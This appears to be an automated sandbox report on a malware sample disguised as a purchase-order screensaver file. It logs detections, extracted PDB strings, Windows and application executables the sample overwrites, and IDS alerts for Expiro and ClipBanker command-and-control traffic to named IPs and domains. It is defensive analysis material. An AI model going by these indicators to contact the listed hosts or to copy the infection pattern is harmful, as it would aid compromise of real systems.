Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Joe Sandbox ML: detected
Source: PO#_1100015533.scr | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: PO#_1100015533.scr | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: C:\Windows\System32\msdtc.exe | File created: C:\Windows\DtcInstall.log
Source: PO#_1100015533.scr | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: msiexec.pdb source: armsvc.exe, 0000000B.00000003.435423769.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.435188760.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe.11.dr
Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\ktab_objs\ktab.pdb source: armsvc.exe, 0000000B.00000003.528121560.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: t:\setupexe\x64\ship\0\setup.pdbx64\ship\0\setup.exe\bbtopt\setupO.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\klist_objs\klist.pdb source: armsvc.exe, 0000000B.00000003.527912305.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: t:\worksconv\x86\ship\0\wkconv.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: vssvc.pdb source: armsvc.exe, 0000000B.00000003.456410377.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.464565627.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, VSSVC.exe.11.dr
Source: Binary string: t:\misc_hev\x86\ship\0\msohtmed.pdb\ship\0\msohtmed.exe\bbtopt\msohtmedO.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sppsvc.pdb source: armsvc.exe, 0000000B.00000003.445848653.0000000002570000.00000004.00001000.00020000.00000000.sdmp, sppsvc.exe.11.dr
Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 0000000B.00000003.421750632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdbE3 source: armsvc.exe, 0000000B.00000003.435423769.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.435188760.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe.11.dr
Source: Binary string: aspnet_state.pdb source: armsvc.exe, 0000000B.00000003.382154090.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, aspnet_state.exe.11.dr
Source: Binary string: _.pdb source: PO#_1100015533.scr, 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp, PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmp, PO#_1100015533.scr, 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.614225292.0000000003F13000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\servertool_objs\servertool.pdb source: armsvc.exe, 0000000B.00000003.530679334.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: FXSSVC.pdb source: armsvc.exe, 0000000B.00000003.418018700.0000000002220000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.418338317.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: snmptrap.pdb@SH source: armsvc.exe, 0000000B.00000003.444842807.0000000001F40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444694493.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445682403.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444714229.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444889546.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444863016.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444876161.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444772908.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445599387.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\worksconv\x86\ship\0\wkconv.pdb86\ship\0\wkconv.exe\bbtopt\wkconvO.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 0000000B.00000003.488416552.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ehSched.pdb source: armsvc.exe, 0000000B.00000003.416561300.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mscorsvw.pdbD source: armsvc.exe, 0000000B.00000003.393419599.0000000001B70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.389710168.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdb@SH source: armsvc.exe, 0000000B.00000003.444541638.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443059564.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443304404.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdb source: armsvc.exe, 0000000B.00000003.444541638.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443059564.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443304404.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdbE3 source: armsvc.exe, 0000000B.00000003.430102360.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.429418798.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msdtc.exe.11.dr
                  Source: Binary string: x64\ship\0\setup.exe\bbtopt\setupO.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jjs_objs\jjs.pdb source: armsvc.exe, 0000000B.00000003.527378625.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\pack200_objs\pack200.pdb source: armsvc.exe, 0000000B.00000003.528425595.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vds.pdb source: armsvc.exe, 0000000B.00000003.453316185.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.449463705.0000000002220000.00000004.00001000.00020000.00000000.sdmp, vds.exe.11.dr
                  Source: Binary string: FXSSVC.pdbH source: armsvc.exe, 0000000B.00000003.418018700.0000000002220000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.418338317.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdb source: armsvc.exe, 0000000B.00000003.469285797.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.479538599.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.11.dr
                  Source: Binary string: t:\setupexe\x64\ship\0\setup.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: VSTOInstaller.pdb source: armsvc.exe, 0000000B.00000003.577349873.0000000001480000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.577330836.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: dllhost.pdb source: armsvc.exe, 0000000B.00000003.406747169.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.411082101.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.406378900.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \ship\0\msohtmed.exe\bbtopt\msohtmedO.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\tnameserv_objs\tnameserv.pdb source: armsvc.exe, 0000000B.00000003.532521819.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WMPNetwk.pdb source: armsvc.exe, 0000000B.00000003.490450790.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.498920191.0000000001C80000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\misc_hev\x86\ship\0\msohtmed.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: SearchIndexer.pdb source: armsvc.exe, 0000000B.00000003.513401630.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, SearchIndexer.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\kinit_objs\kinit.pdb source: armsvc.exe, 0000000B.00000003.527765459.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: armsvc.exe, 0000000B.00000003.581129841.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ieetwcollector.pdb source: armsvc.exe, 0000000B.00000003.423169335.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.423336271.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: armsvc.exe, 0000000B.00000003.528742519.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, OSE.EXE.11.dr
                  Source: Binary string: PerfHost.pdb source: armsvc.exe, 0000000B.00000003.442858130.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.441621041.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.441414190.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dw20.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\orbd_objs\orbd.pdb source: armsvc.exe, 0000000B.00000003.528293885.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 0000000B.00000003.488416552.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vds.pdbH source: armsvc.exe, 0000000B.00000003.453316185.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.449463705.0000000002220000.00000004.00001000.00020000.00000000.sdmp, vds.exe.11.dr
                  Source: Binary string: wbengine.pdb@SH source: armsvc.exe, 0000000B.00000003.469285797.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.479538599.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.11.dr
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb D source: OSE.EXE.11.dr
                  Source: Binary string: \ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb? source: powershell.exe, 00000010.00000002.403965054.0000000005058000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: i0C:\Windows\mscorlib.pdb source: hVVSnrrP.exe, 00000035.00000002.548197085.0000000000678000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdb source: armsvc.exe, 0000000B.00000003.430102360.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.429418798.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msdtc.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\keytool_objs\keytool.pdb source: armsvc.exe, 0000000B.00000003.527614057.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.403965054.0000000005058000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 86\ship\0\wkconv.exe\bbtopt\wkconvO.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmid_objs\rmid.pdb source: armsvc.exe, 0000000B.00000003.528636073.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 0000000B.00000003.421750632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java-rmi_objs\java-rmi.pdb source: armsvc.exe, 0000000B.00000003.523640565.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mscorsvw.pdb source: armsvc.exe, 0000000B.00000003.393419599.0000000001B70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.403111110.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.405006368.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.395627106.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.389710168.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.394676525.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.402917632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\policytool_objs\policytool.pdb source: armsvc.exe, 0000000B.00000003.528519701.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: armsvc.exe, 0000000B.00000003.444842807.0000000001F40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444694493.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445682403.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444714229.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444889546.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444863016.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444876161.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444772908.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445599387.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ieetwcollector.pdbH source: armsvc.exe, 0000000B.00000003.423169335.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.423336271.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\toolkit\components\maintenanceservice\maintenanceservice.pdb source: armsvc.exe, 0000000B.00000003.428010284.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ehRecvr.pdb source: armsvc.exe, 0000000B.00000003.412276451.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: y\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, OSE.EXE.11.dr

                  Spreading

                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\VSSVC.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\wbengine.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\SearchIndexer.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\ehome\ehsched.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr System file written: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\vds.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr System file written: C:\Windows\System32\alg.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\dllhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\ieetwcollector.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\Locator.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scr System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\sppsvc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
                  Source: C:\Windows\ehome\ehrecvr.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\ehome\ehrecvr.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs
                  Source: C:\Windows\ehome\ehrecvr.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid
                  Source: C:\Windows\ehome\ehrecvr.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid
                  Source: C:\Windows\ehome\ehrecvr.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                  Source: C:\Windows\ehome\ehrecvr.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32
                  Source: C:\Windows\ehome\ehrecvr.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler
                  Source: C:\Windows\ehome\ehrecvr.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\ehome\ehrecvr.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\adobe\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\

                  Networking

                  Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.22:60507 -> 8.8.8.8:53
                  Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.22:59447 -> 8.8.8.8:53
                  Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.22:56475 -> 8.8.8.8:53
                  Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.22:49194 -> 82.112.184.197:80
                  Source: Network traffic Suricata IDS: 2034983 - Severity 1 - ET MALWARE Win32/ClipBanker.OC CnC Activity M2 : 192.168.2.22:49183 -> 82.112.184.197:80
                  Source: Network traffic Suricata IDS: 2034983 - Severity 1 - ET MALWARE Win32/ClipBanker.OC CnC Activity M2 : 192.168.2.22:49175 -> 54.244.188.177:80
                  Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.22:52781 -> 8.8.8.8:53
                  Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.22:50568 -> 8.8.8.8:53
                  Source: unknown Network traffic detected: DNS query count 35
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: Joe Sandbox View IP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox View IP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox View IP Address: 3.94.10.34 3.94.10.34
                  Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe DNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe DNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe DNS query: name: reallyfreegeoip.org
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.22:49188
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.22:49182
                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.22:49188
                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.22:49182
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.22:49213
                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.22:49213
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.22:49211
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.22:49214
                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.22:49211
                  Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.22:49206
